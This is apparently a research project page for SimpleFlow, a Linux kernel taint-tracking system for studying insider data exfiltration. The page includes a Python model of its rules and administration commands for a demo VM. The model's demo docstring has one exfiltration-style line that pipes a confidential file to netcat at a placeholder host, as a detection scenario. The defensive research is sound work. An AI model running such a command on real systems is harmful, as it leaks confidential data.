SimpleFlow

Overview

SimpleFlow implements a very simple view of information flow within the Linux kernel. (We do not claim to approach the sophistication of IX, HiStar, etc.) We have found the design of SimpleFlow useful in education and certain computer-security competitions, and we are also interested in the use of SimpleFlow to study post-compromise exfiltration and insider threats.

Under SimpleFlow, the system administrator designates some filesystem objects as confidential and some programs as trusted (SimpleFlow stores both using extended attributes). Any process not loaded from a trusted program will become tainted upon reading a confidential object. The kernel transfers this taint status from process to process as a result of inter-process communication (e.g., an untainted process reads from a tainted process over an IPC channel). If a tainted process writes to the network, the kernel sets the packet's RFC 3514 evil bit; this allows for a variety of filtering or spoofing strategies which might help determine the intention of the principal who read the confidential data in the first place.
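The rules in the paragraph above, written out as a small Python model so the taint transitions and the packet marking can be traced on sample input. This is an added example for this page, not SimpleFlow's kernel code; the class and function names, the sample program paths and the constructed IPv4 packet are this example's own. The only outside fact it relies on is RFC 3514's placement of the evil bit in the reserved high-order bit of the IPv4 flags/fragment-offset word.

```python
"""Model of the SimpleFlow taint rules from the overview, plus the RFC 3514
evil bit on packets a tainted process sends.  Added example, not project
code: names, paths and the sample packet are constructed for illustration."""
import struct
from dataclasses import dataclass


@dataclass
class File:
    path: str
    confidential: bool = False   # models security.simple-flow.confidential
    trusted: bool = False        # models security.simple-flow.trusted


@dataclass
class Process:
    pid: int
    image: File                  # program this process was loaded from
    tainted: bool = False        # what `ps auxZ` would report


def read_file(proc: Process, f: File) -> None:
    """A process not loaded from a trusted program is tainted by reading a
    confidential object; a trusted program's process is not."""
    if f.confidential and not proc.image.trusted:
        proc.tainted = True


def ipc_read(reader: Process, writer: Process) -> None:
    """Taint follows the data from writer to reader over an IPC channel."""
    if writer.tainted:
        reader.tainted = True


EVIL_BIT = 0x8000  # reserved high-order bit of the flags/frag-offset word


def ipv4_checksum(header: bytes) -> int:
    """Ones' complement sum over the header; returns 0 for a valid header
    that already carries its checksum."""
    total = 0
    for i in range(0, len(header), 2):
        hi = header[i]
        lo = header[i + 1] if i + 1 < len(header) else 0
        total += (hi << 8) | lo
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def make_ipv4_header(src: str, dst: str, flags_frag: int = 0x4000) -> bytes:
    """Constructed 20-byte IPv4 header (DF set, TCP, TTL 64) with checksum."""
    hdr = bytearray(struct.pack(
        "!BBHHHBBH4s4s", 0x45, 0, 20, 0x1234, flags_frag, 64, 6, 0,
        bytes(int(o) for o in src.split(".")),
        bytes(int(o) for o in dst.split("."))))
    struct.pack_into("!H", hdr, 10, ipv4_checksum(hdr))
    return bytes(hdr)


def evil_bit_set(packet: bytes) -> bool:
    """What a filter at the network edge would test on each packet."""
    return bool(struct.unpack_from("!H", packet, 6)[0] & EVIL_BIT)


def set_evil_bit(packet: bytes) -> bytes:
    """Set the evil bit and refresh the header checksum; payload untouched."""
    ihl = (packet[0] & 0x0F) * 4
    if packet[0] >> 4 != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not an IPv4 packet")
    hdr = bytearray(packet[:ihl])
    struct.pack_into("!H", hdr, 6, struct.unpack_from("!H", hdr, 6)[0] | EVIL_BIT)
    struct.pack_into("!H", hdr, 10, 0)
    struct.pack_into("!H", hdr, 10, ipv4_checksum(hdr))
    return bytes(hdr) + packet[ihl:]


def send_packet(proc: Process, packet: bytes) -> bytes:
    """The kernel rule: a tainted process's outbound packets carry the bit."""
    return set_evil_bit(packet) if proc.tainted else packet


# Constructed sample packet: 20-byte header plus an arbitrary payload.
SAMPLE_PACKET = make_ipv4_header("10.0.0.5", "192.0.2.10") + b"constructed payload"


def demo() -> dict:
    """Scenario: `cat /srv/secret.txt | nc host port` next to a trusted backup tool."""
    secret = File("/srv/secret.txt", confidential=True)
    cat = Process(100, File("/usr/bin/cat"))
    backup = Process(101, File("/usr/sbin/backup", trusted=True))
    nc = Process(102, File("/usr/bin/nc"))
    read_file(cat, secret)      # untrusted reader: tainted
    read_file(backup, secret)   # trusted program: stays clean
    ipc_read(nc, cat)           # nc reads cat's output over the pipe
    return {
        "cat_tainted": cat.tainted,
        "backup_tainted": backup.tainted,
        "nc_tainted": nc.tainted,
        "nc_packet_evil": evil_bit_set(send_packet(nc, SAMPLE_PACKET)),
        "backup_packet_evil": evil_bit_set(send_packet(backup, SAMPLE_PACKET)),
    }
```

The model deliberately has no declassification path: once tainted, a process stays tainted until an administrator clears it (the `/proc/PID/attr/current` write described under the VM commands), which is also why the evil bit is a per-packet consequence of process state rather than of the data in the packet.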

SimpleFlow Virtual Machine

SimpleFlowDemo-0.3-linux-3.10.0.ova provides in OVA format a virtual machine which contains a SimpleFlow kernel along with a CentOS 7 installation. Some useful SimpleFlow-related commands include:

setfattr -n security.simple-flow.confidential -v true PATH
Set the confidential flag on the file at PATH.
setfattr -x security.simple-flow.confidential PATH
Remove the confidential flag from the file at PATH.
setfattr -n security.simple-flow.trusted -v true PATH
Set the trusted flag on the program at PATH.
setfattr -x security.simple-flow.trusted PATH
Remove the trusted flag from the program at PATH.
ps auxZ
Enumerate the running processes, including whether they are tainted.
echo 1 > /proc/PID/attr/current
Taint the process matching PID.
echo 0 > /proc/PID/attr/current
Untaint the process matching PID.
dmesg -w
Watch SimpleFlow (and other kernel) events.

Related publications

(2016). Studying Naive Users and the Insider Threat with SimpleFlow. Proceedings of the 8th ACM CCS International Workshop on Managing Insider Security Threats.

PDF

Downloads

The SimpleFlow project is also available as a Git repository. To clone the repository, execute

git clone https://www.flyn.org/git/simple-flow-kernel -b v3.10-simpleflow